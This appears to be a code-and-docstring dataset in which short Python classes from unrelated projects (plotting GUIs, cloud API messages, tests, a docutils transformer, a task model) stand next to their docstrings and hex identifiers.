<NEW_LINE> choice = self.plotter_cbox.GetValue() <NEW_LINE> try: <NEW_LINE> <INDENT> if choice == "ebands": <NEW_LINE> <INDENT> plotter = ElectronBandsPlotter() <NEW_LINE> for filepath in selected_files: <NEW_LINE> <INDENT> plotter.add_ebands_from_file(filepath) <NEW_LINE> <DEDENT> plotter.plot() <NEW_LINE> <DEDENT> elif choice == "edos": <NEW_LINE> <INDENT> dos_dialog = ElectronDosDialog(None) <NEW_LINE> if dos_dialog.ShowModal() == wx.ID_OK: <NEW_LINE> <INDENT> p = dos_dialog.GetParams() <NEW_LINE> plotter = ElectronDosPlotter() <NEW_LINE> for filepath in selected_files: <NEW_LINE> <INDENT> plotter.add_edos_from_file(filepath, **p) <NEW_LINE> <DEDENT> plotter.plot() <NEW_LINE> <DEDENT> dos_dialog.Destroy() <NEW_LINE> <DEDENT> elif choice == "mdf": <NEW_LINE> <INDENT> plotter = MdfPlotter() <NEW_LINE> for filepath in selected_files: <NEW_LINE> <INDENT> plotter.add_mdf_from_file(filepath, mdf_type="exc") <NEW_LINE> <DEDENT> plotter.plot() <NEW_LINE> <DEDENT> elif choice == "sigres": <NEW_LINE> <INDENT> plotter = SigresPlotter() <NEW_LINE> plotter.add_files(selected_files) <NEW_LINE> plotter.plot_qpgaps() <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> awx.showErrorMessage(self, message="No function registered for choice %s" % choice) <NEW_LINE> <DEDENT> <DEDENT> except Exception: <NEW_LINE> <INDENT> awx.showErrorMessage(self)
This frame allows the user to select/deselect a list of files and to produce plots for all the files selected. Useful for convergence studies.
62599068097d151d1a2c2817
class NodePool(_messages.Message): <NEW_LINE> <INDENT> class StatusValueValuesEnum(_messages.Enum): <NEW_LINE> <INDENT> STATUS_UNSPECIFIED = 0 <NEW_LINE> PROVISIONING = 1 <NEW_LINE> RUNNING = 2 <NEW_LINE> RUNNING_WITH_ERROR = 3 <NEW_LINE> RECONCILING = 4 <NEW_LINE> STOPPING = 5 <NEW_LINE> ERROR = 6 <NEW_LINE> <DEDENT> autoscaling = _messages.MessageField('NodePoolAutoscaling', 1) <NEW_LINE> conditions = _messages.MessageField('StatusCondition', 2, repeated=True) <NEW_LINE> config = _messages.MessageField('NodeConfig', 3) <NEW_LINE> initialNodeCount = _messages.IntegerField(4, variant=_messages.Variant.INT32) <NEW_LINE> instanceGroupUrls = _messages.StringField(5, repeated=True) <NEW_LINE> management = _messages.MessageField('NodeManagement', 6) <NEW_LINE> name = _messages.StringField(7) <NEW_LINE> selfLink = _messages.StringField(8) <NEW_LINE> status = _messages.EnumField('StatusValueValuesEnum', 9) <NEW_LINE> statusMessage = _messages.StringField(10) <NEW_LINE> version = _messages.StringField(11)
NodePool contains the name and configuration for a cluster's node pool. Node pools are a set of nodes (i.e. VM's), with a common configuration and specification, under the control of the cluster master. They may have a set of Kubernetes labels applied to them, which may be used to reference them during pod scheduling. They may also be resized up or down, to accommodate the workload. Enums: StatusValueValuesEnum: [Output only] The status of the nodes in this pool instance. Fields: autoscaling: Autoscaler configuration for this NodePool. Autoscaler is enabled only if a valid configuration is present. conditions: Which conditions caused the current node pool state. config: The node configuration of the pool. initialNodeCount: The initial node count for the pool. You must ensure that your Compute Engine <a href="/compute/docs/resource- quotas">resource quota</a> is sufficient for this number of instances. You must also have available firewall and routes quota. instanceGroupUrls: [Output only] The resource URLs of the [managed instance groups](/compute/docs/instance-groups/creating-groups-of- managed-instances) associated with this node pool. management: NodeManagement configuration for this NodePool. name: The name of the node pool. selfLink: [Output only] Server-defined URL for the resource. status: [Output only] The status of the nodes in this pool instance. statusMessage: [Output only] Additional information about the current status of this node pool instance, if available. version: The version of the Kubernetes of this node.
625990687047854f46340b5e
class Poll(db.Model): <NEW_LINE> <INDENT> title = db.StringProperty() <NEW_LINE> n_problems = db.IntegerProperty() <NEW_LINE> problem_titles = db.StringListProperty() <NEW_LINE> votes = db.ListProperty(int) <NEW_LINE> created = db.DateTimeProperty(auto_now_add=True)
Models an individual poll with a title, problem titles, vote counts, and creation date.
62599068cc40096d6161adb5
class TestFrameGetStateConfirmation(unittest.TestCase): <NEW_LINE> <INDENT> EXAMPLE_FRAME = b"\x00\t\x00\r\x03\x80\x00\x00\x00\x00\x87" <NEW_LINE> def test_bytes(self): <NEW_LINE> <INDENT> frame = FrameGetStateConfirmation() <NEW_LINE> frame.gateway_state = GatewayState.BEACON_MODE_NOT_CONFIGURED <NEW_LINE> frame.gateway_sub_state = GatewaySubState.PERFORMING_TASK_COMMAND <NEW_LINE> self.assertEqual(bytes(frame), self.EXAMPLE_FRAME) <NEW_LINE> <DEDENT> def test_frame_from_raw(self): <NEW_LINE> <INDENT> frame = frame_from_raw(self.EXAMPLE_FRAME) <NEW_LINE> self.assertTrue(isinstance(frame, FrameGetStateConfirmation)) <NEW_LINE> self.assertEqual(frame.gateway_state, GatewayState.BEACON_MODE_NOT_CONFIGURED) <NEW_LINE> self.assertEqual( frame.gateway_sub_state, GatewaySubState.PERFORMING_TASK_COMMAND ) <NEW_LINE> <DEDENT> def test_str(self): <NEW_LINE> <INDENT> frame = FrameGetStateConfirmation() <NEW_LINE> frame.gateway_state = GatewayState.BEACON_MODE_NOT_CONFIGURED <NEW_LINE> frame.gateway_sub_state = GatewaySubState.PERFORMING_TASK_COMMAND <NEW_LINE> self.assertEqual( str(frame), "<FrameGetStateConfirmation " 'gateway_state="GatewayState.BEACON_MODE_NOT_CONFIGURED" ' 'gateway_sub_state="GatewaySubState.PERFORMING_TASK_COMMAND"/>', )
Test class FrameGetStateConfirmation.
62599068462c4b4f79dbd1b1
class PdfFile: <NEW_LINE> <INDENT> def __init__(self, filename: str, binary: bytes): <NEW_LINE> <INDENT> super().__init__() <NEW_LINE> self.filename = filename <NEW_LINE> self.binary = binary <NEW_LINE> <DEDENT> @staticmethod <NEW_LINE> def from_file(file): <NEW_LINE> <INDENT> return PdfFile(filename=os.path.basename(file), binary=file_to_bytes(file)) <NEW_LINE> <DEDENT> def __str__(self): <NEW_LINE> <INDENT> return "PdfFile: {}, {:.2f} MB".format(self.filename, len(self.binary) / MB) <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> return self.__str__()
a wrapper for a PDF file. Consists of the file name and the binary contents of the file.
625990683539df3088ecda49
class BrowserHandler(BaseHandler): <NEW_LINE> <INDENT> def get(self): <NEW_LINE> <INDENT> loader = tornado.template.Loader('../server/templates') <NEW_LINE> try: <NEW_LINE> <INDENT> n = self.get_argument('n') <NEW_LINE> <DEDENT> except: <NEW_LINE> <INDENT> n = 3 <NEW_LINE> <DEDENT> db = self.settings['db'] <NEW_LINE> logging.debug('hit the BrowserHandler endpoint with n=', n) <NEW_LINE> keywords = [] <NEW_LINE> found = 0 <NEW_LINE> while found < int(n): <NEW_LINE> <INDENT> k = db.randomkey() <NEW_LINE> if k not in keywords: <NEW_LINE> <INDENT> keywords.append(k) <NEW_LINE> found += 1 <NEW_LINE> <DEDENT> <DEDENT> self.write(loader.load("rf_main.html").generate(keywords=keywords)) <NEW_LINE> self.finish()
HTML display of rf-immanence data browsed in the last day
6259906832920d7e50bc77f0
class DictionariesResource(Resource): <NEW_LINE> <INDENT> schema = { 'name': { 'type': 'string', 'required': True }, 'language_id': { 'type': 'string', 'required': True }, 'content': { 'type': 'dict', }, 'content_list': { 'type': 'string', }, DICTIONARY_FILE: { 'type': 'file', }, 'user': Resource.rel('users', nullable=True), 'is_active': { 'type': 'string', 'default': 'true', }, 'type': { 'type': 'string', 'default': DictionaryType.DICTIONARY.value, 'allowed': DictionaryType.values() }, '_file_id': {'type': 'objectid', 'nullable': True, 'readonly': True}, } <NEW_LINE> item_methods = ['GET', 'PATCH', 'PUT', 'DELETE'] <NEW_LINE> resource_methods = ['GET', 'POST', 'DELETE'] <NEW_LINE> privileges = {'POST': 'dictionaries', 'PATCH': 'dictionaries', 'DELETE': 'dictionaries'} <NEW_LINE> etag_ignore_fields = ['content', 'content_list']
Dictionaries schema
6259906832920d7e50bc77f1
@override_waffle_flag(COURSE_HOME_MICROFRONTEND, active=True) <NEW_LINE> @ddt.ddt <NEW_LINE> class ProgressTabTestViews(BaseCourseHomeTests): <NEW_LINE> <INDENT> def setUp(self): <NEW_LINE> <INDENT> super().setUp() <NEW_LINE> self.url = reverse('course-home-progress-tab', args=[self.course.id]) <NEW_LINE> <DEDENT> @ddt.data(CourseMode.AUDIT, CourseMode.VERIFIED) <NEW_LINE> def test_get_authenticated_enrolled_user(self, enrollment_mode): <NEW_LINE> <INDENT> CourseEnrollment.enroll(self.user, self.course.id, enrollment_mode) <NEW_LINE> response = self.client.get(self.url) <NEW_LINE> self.assertEqual(response.status_code, 200) <NEW_LINE> self.assertIsNotNone(response.data['courseware_summary']) <NEW_LINE> for chapter in response.data['courseware_summary']: <NEW_LINE> <INDENT> self.assertIsNotNone(chapter) <NEW_LINE> <DEDENT> self.assertIn('settings/grading/' + str(self.course.id), response.data['studio_url']) <NEW_LINE> self.assertEqual(response.data['credit_support_url'], CREDIT_SUPPORT_URL) <NEW_LINE> self.assertIsNotNone(response.data['verification_data']) <NEW_LINE> self.assertEqual(response.data['verification_data']['status'], 'none') <NEW_LINE> if enrollment_mode == CourseMode.VERIFIED: <NEW_LINE> <INDENT> ManualVerification.objects.create(user=self.user, status='approved') <NEW_LINE> response = self.client.get(self.url) <NEW_LINE> self.assertEqual(response.data['verification_data']['status'], 'approved') <NEW_LINE> self.assertIsNone(response.data['certificate_data']) <NEW_LINE> <DEDENT> elif enrollment_mode == CourseMode.AUDIT: <NEW_LINE> <INDENT> self.assertEqual(response.data['certificate_data']['cert_status'], 'audit_passing') <NEW_LINE> <DEDENT> <DEDENT> def test_get_authenticated_user_not_enrolled(self): <NEW_LINE> <INDENT> response = self.client.get(self.url) <NEW_LINE> self.assertEqual(response.status_code, 302) <NEW_LINE> <DEDENT> def test_get_unauthenticated_user(self): <NEW_LINE> <INDENT> self.client.logout() <NEW_LINE> response = self.client.get(self.url) <NEW_LINE> self.assertEqual(response.status_code, 403) <NEW_LINE> <DEDENT> def test_get_unknown_course(self): <NEW_LINE> <INDENT> url = reverse('course-home-progress-tab', args=['course-v1:unknown+course+2T2020']) <NEW_LINE> response = self.client.get(url) <NEW_LINE> self.assertEqual(response.status_code, 404) <NEW_LINE> <DEDENT> def test_masquerade(self): <NEW_LINE> <INDENT> user = UserFactory() <NEW_LINE> set_user_preference(user, 'time_zone', 'Asia/Tokyo') <NEW_LINE> CourseEnrollment.enroll(user, self.course.id) <NEW_LINE> self.switch_to_staff() <NEW_LINE> self.assertIsNone(self.client.get(self.url).data['user_timezone']) <NEW_LINE> self.update_masquerade(username=user.username) <NEW_LINE> self.assertEqual(self.client.get(self.url).data['user_timezone'], 'Asia/Tokyo')
Tests for the Progress Tab API
62599068d6c5a102081e38d2
class Capturer(object): <NEW_LINE> <INDENT> def __init__(self, channel=0, cam_width=800, cam_height=600): <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> self._camera = cv2.VideoCapture(channel) <NEW_LINE> <DEDENT> except Exception as e: <NEW_LINE> <INDENT> sys.exit('Unable to use the webcam, error: %s' % str(e)) <NEW_LINE> <DEDENT> self._frame = None <NEW_LINE> self.cam_width = cam_width <NEW_LINE> self.cam_height = cam_height <NEW_LINE> self._channel = channel <NEW_LINE> self._camera.set(cv2.CAP_PROP_FRAME_WIDTH, cam_width) <NEW_LINE> self._camera.set(cv2.CAP_PROP_FRAME_HEIGHT, cam_height) <NEW_LINE> <DEDENT> def get_camera_width_heigth(self): <NEW_LINE> <INDENT> return self.cam_width, self.cam_height <NEW_LINE> <DEDENT> def get_frame(self): <NEW_LINE> <INDENT> _, frame = self._camera.read() <NEW_LINE> return frame <NEW_LINE> <DEDENT> def release(self): <NEW_LINE> <INDENT> self._camera.release()
Provides an interface to the camera. #TODO: automate the capture process by testing each channel
62599068cc0a2c111447c6a5
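A short usage sketch of the class above, assuming a webcam is available on channel 0 and OpenCV (`cv2`) is installed; the output path is a placeholder.

import cv2

cam = Capturer(channel=0, cam_width=640, cam_height=480)
frame = cam.get_frame()                  # single BGR frame as a numpy array
if frame is not None:
    cv2.imwrite("snapshot.png", frame)   # "snapshot.png" is an illustrative path
cam.release()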
class JsonDict(dict): <NEW_LINE> <INDENT> def __getattr__(self, attr): <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> return self[attr] <NEW_LINE> <DEDENT> except KeyError: <NEW_LINE> <INDENT> raise AttributeError(r"'JsonDict' object has no attribute '%s'" % attr) <NEW_LINE> <DEDENT> <DEDENT> def __setattr__(self, attr, value): <NEW_LINE> <INDENT> self[attr] = value <NEW_LINE> <DEDENT> def __getstate__(self): <NEW_LINE> <INDENT> return self.copy() <NEW_LINE> <DEDENT> def __setstate__(self, state): <NEW_LINE> <INDENT> self.update(state)
General JSON object that allows attributes to be bound to it and also behaves like a dict
6259906821bff66bcd724411
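A quick illustration of the dual attribute/key access the class provides; the values are illustrative.

d = JsonDict(name="alice", age=30)
assert d.name == d["name"] == "alice"    # attribute and key access are equivalent
d.email = "alice@example.com"            # attribute assignment stores a key
assert "email" in d
try:
    d.missing
except AttributeError:
    pass  # unknown attributes raise AttributeError, mirroring normal objects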
class InvalidParameter(InvalidParameters): <NEW_LINE> <INDENT> default_message = _("Invalid value for parameter {param}.") <NEW_LINE> def __init__(self, message=None, *, param, **kwargs): <NEW_LINE> <INDENT> super().__init__(message) <NEW_LINE> self.kwargs = {**kwargs, "param": param}
Invalid initialization parameter PARAM received from the request. Takes a `param` kwarg
6259906816aa5153ce401c85
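A hedged example of how the exception might be raised while validating request input; the helper below is illustrative only and not part of the original code.

def parse_page(raw_page: str) -> int:
    # Illustrative validation helper using the exception defined above.
    try:
        page = int(raw_page)
    except ValueError:
        raise InvalidParameter(param="page")
    if page < 1:
        raise InvalidParameter("Page numbers start at 1.", param="page")
    return page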
class CapsOnStatus(IntervalModule): <NEW_LINE> <INDENT> interval = 2 <NEW_LINE> def caps_lock_status(self): <NEW_LINE> <INDENT> pwd = ( '/home/thorgeir/github/thorgeir/' 'i3wm-config-thorgeir/custom_status_bar' ) <NEW_LINE> if not os.path.exists(pwd): <NEW_LINE> <INDENT> pwd = os.path.dirname(os.path.realpath(__file__)) <NEW_LINE> <DEDENT> process = subprocess.Popen( ["bash", "{0}/caps_status.sh".format(pwd)], stdout=subprocess.PIPE ) <NEW_LINE> output, error = process.communicate() <NEW_LINE> output = output.decode('utf-8') <NEW_LINE> return output.split('\n')[0] <NEW_LINE> <DEDENT> def run(self): <NEW_LINE> <INDENT> caps_colors = { 'off': '#00ff00', 'on': '#ff0000' } <NEW_LINE> full_text = u'■'*30 <NEW_LINE> self.output = { 'full_text': full_text, 'color': caps_colors[self.caps_lock_status()] }
Show a big, colorful status bar
6259906866673b3332c31ba9
class NpcBrain(Brain): <NEW_LINE> <INDENT> def __init__(self, go): <NEW_LINE> <INDENT> Brain.__init__(self, go, delay_first = 2, next_thought = self.start) <NEW_LINE> <DEDENT> def start(self): <NEW_LINE> <INDENT> self.go.position = self.go.start_position <NEW_LINE> return self.follow_right <NEW_LINE> <DEDENT> def follow_right(self): <NEW_LINE> <INDENT> if not self.go.gs.maze.blocks(self.go, 90): <NEW_LINE> <INDENT> self.go.turn(90) <NEW_LINE> self.wait(1) <NEW_LINE> return self.go_fwd_one <NEW_LINE> <DEDENT> if self.go.gs.maze.blocks(self.go, 0): <NEW_LINE> <INDENT> self.go.turn(-90) <NEW_LINE> self.wait(1) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> self.go.fwd() <NEW_LINE> self.wait(1) <NEW_LINE> <DEDENT> <DEDENT> def go_fwd_one(self): <NEW_LINE> <INDENT> self.go.fwd() <NEW_LINE> self.wait(1) <NEW_LINE> return self.follow_right
Class to model an NPC's brain, i.e., one that follows the right-hand wall.
625990685166f23b2e244b7e
class NoFaceDetected(Exception): <NEW_LINE> <INDENT> def __init__(self) -> None: <NEW_LINE> <INDENT> self.message = "No face found in image!!"
Raised when no face is detected in an image. Attributes: message: (str) Exception message
62599068462c4b4f79dbd1b3
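A sketch of where an exception like this would typically be raised; the guard function is hypothetical and simply stands in for whatever face detector the project uses.

def require_face(faces: list) -> None:
    # `faces` is assumed to be the list of bounding boxes returned by a detector.
    if not faces:
        raise NoFaceDetected()

try:
    require_face([])
except NoFaceDetected as err:
    print(err.message)  # "No face found in image!!"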
class Sku(Model): <NEW_LINE> <INDENT> _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, } <NEW_LINE> def __init__(self, name=None): <NEW_LINE> <INDENT> super(Sku, self).__init__() <NEW_LINE> self.name = name
The pricing tier (defines a CDN provider, feature list and rate) of the CDN profile. :param name: Name of the pricing tier. Possible values include: 'Standard_Verizon', 'Premium_Verizon', 'Custom_Verizon', 'Standard_Akamai', 'Standard_ChinaCdn' :type name: str or ~azure.mgmt.cdn.models.SkuName
62599068cc40096d6161adb6
class Transformer(TransformSpec): <NEW_LINE> <INDENT> from docutils.transforms import universal <NEW_LINE> default_transforms = (universal.Decorations, universal.FinalChecks, universal.Messages) <NEW_LINE> def __init__(self, document): <NEW_LINE> <INDENT> self.transforms = [] <NEW_LINE> self.document = document <NEW_LINE> self.applied = [] <NEW_LINE> self.sorted = 0 <NEW_LINE> self.components = {} <NEW_LINE> self.serialno = 0 <NEW_LINE> <DEDENT> def add_transform(self, transform_class, priority=None): <NEW_LINE> <INDENT> if priority is None: <NEW_LINE> <INDENT> priority = transform_class.default_priority <NEW_LINE> <DEDENT> priority_string = self.get_priority_string(priority) <NEW_LINE> self.transforms.append((priority_string, transform_class, None)) <NEW_LINE> self.sorted = 0 <NEW_LINE> <DEDENT> def add_transforms(self, transform_list): <NEW_LINE> <INDENT> for transform_class in transform_list: <NEW_LINE> <INDENT> priority_string = self.get_priority_string( transform_class.default_priority) <NEW_LINE> self.transforms.append((priority_string, transform_class, None)) <NEW_LINE> <DEDENT> self.sorted = 0 <NEW_LINE> <DEDENT> def add_pending(self, pending, priority=None): <NEW_LINE> <INDENT> transform_class = pending.transform <NEW_LINE> if priority is None: <NEW_LINE> <INDENT> priority = transform_class.default_priority <NEW_LINE> <DEDENT> priority_string = self.get_priority_string(priority) <NEW_LINE> self.transforms.append((priority_string, transform_class, pending)) <NEW_LINE> self.sorted = 0 <NEW_LINE> <DEDENT> def get_priority_string(self, priority): <NEW_LINE> <INDENT> self.serialno += 1 <NEW_LINE> return '%03d-%03d' % (priority, self.serialno) <NEW_LINE> <DEDENT> def populate_from_components(self, components): <NEW_LINE> <INDENT> self.add_transforms(self.default_transforms) <NEW_LINE> for component in components: <NEW_LINE> <INDENT> if component is None: <NEW_LINE> <INDENT> continue <NEW_LINE> <DEDENT> self.add_transforms(component.default_transforms) <NEW_LINE> self.components[component.component_type] = component <NEW_LINE> <DEDENT> self.sorted = 0 <NEW_LINE> <DEDENT> def apply_transforms(self): <NEW_LINE> <INDENT> self.document.reporter.attach_observer( self.document.note_transform_message) <NEW_LINE> while self.transforms: <NEW_LINE> <INDENT> if not self.sorted: <NEW_LINE> <INDENT> self.transforms.sort() <NEW_LINE> self.transforms.reverse() <NEW_LINE> self.sorted = 1 <NEW_LINE> <DEDENT> priority, transform_class, pending = self.transforms.pop() <NEW_LINE> transform = transform_class(self.document, startnode=pending) <NEW_LINE> transform.apply() <NEW_LINE> self.applied.append((priority, transform_class, pending))
Stores transforms (`Transform` classes) and applies them to document trees. Also keeps track of components by component type name.
6259906891f36d47f2231a65
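A hedged sketch of registering and running a custom transform with the class above; `document` is assumed to be an already-parsed docutils document tree, and `MyTransform` a hypothetical `docutils.transforms.Transform` subclass defined elsewhere.

# Sketch only: both names below come from the surrounding project, not docutils.
transformer = Transformer(document)
transformer.add_transform(MyTransform, priority=500)  # lower numbers run first
transformer.apply_transforms()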
class Task(dict): <NEW_LINE> <INDENT> __id = None <NEW_LINE> due_date = None <NEW_LINE> assignee = None <NEW_LINE> value = None <NEW_LINE> status = None <NEW_LINE> def __init__(self): <NEW_LINE> <INDENT> super(Task, self).__init__() <NEW_LINE> self.set_id() <NEW_LINE> <DEDENT> def get_id(self): <NEW_LINE> <INDENT> return self["__id"] <NEW_LINE> <DEDENT> def set_id(self): <NEW_LINE> <INDENT> self["__id"] = str(uuid.uuid4()) <NEW_LINE> <DEDENT> def get_due_date(self): <NEW_LINE> <INDENT> return self["due_date"] <NEW_LINE> <DEDENT> def set_due_date(self, due_date): <NEW_LINE> <INDENT> self["due_date"] = due_date <NEW_LINE> <DEDENT> def get_assignee(self): <NEW_LINE> <INDENT> return self["assignee"] <NEW_LINE> <DEDENT> def set_assignee(self, assignee): <NEW_LINE> <INDENT> self["assignee"] = assignee <NEW_LINE> <DEDENT> def get_value(self): <NEW_LINE> <INDENT> return self["value"] <NEW_LINE> <DEDENT> def set_value(self, value): <NEW_LINE> <INDENT> self["value"] = value <NEW_LINE> <DEDENT> def get_status(self): <NEW_LINE> <INDENT> return self["status"] <NEW_LINE> <DEDENT> def set_status(self, status): <NEW_LINE> <INDENT> self["status"] = status
Task object that inherits from the Python built-in dictionary to store its data. A SQLAlchemy entity would handle this more easily, but SQLAlchemy was avoided to keep the package dependencies small.
6259906832920d7e50bc77f3
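A brief usage sketch of the dictionary-backed task above; the field values are illustrative.

task = Task()                      # generates a fresh uuid under "__id"
task.set_assignee("alice")
task.set_due_date("2024-07-01")    # illustrative ISO-style date string
task.set_status("open")
task.set_value(42)
print(task.get_id(), task.get_status())
print(dict(task))                  # plain-dict view, since Task subclasses dict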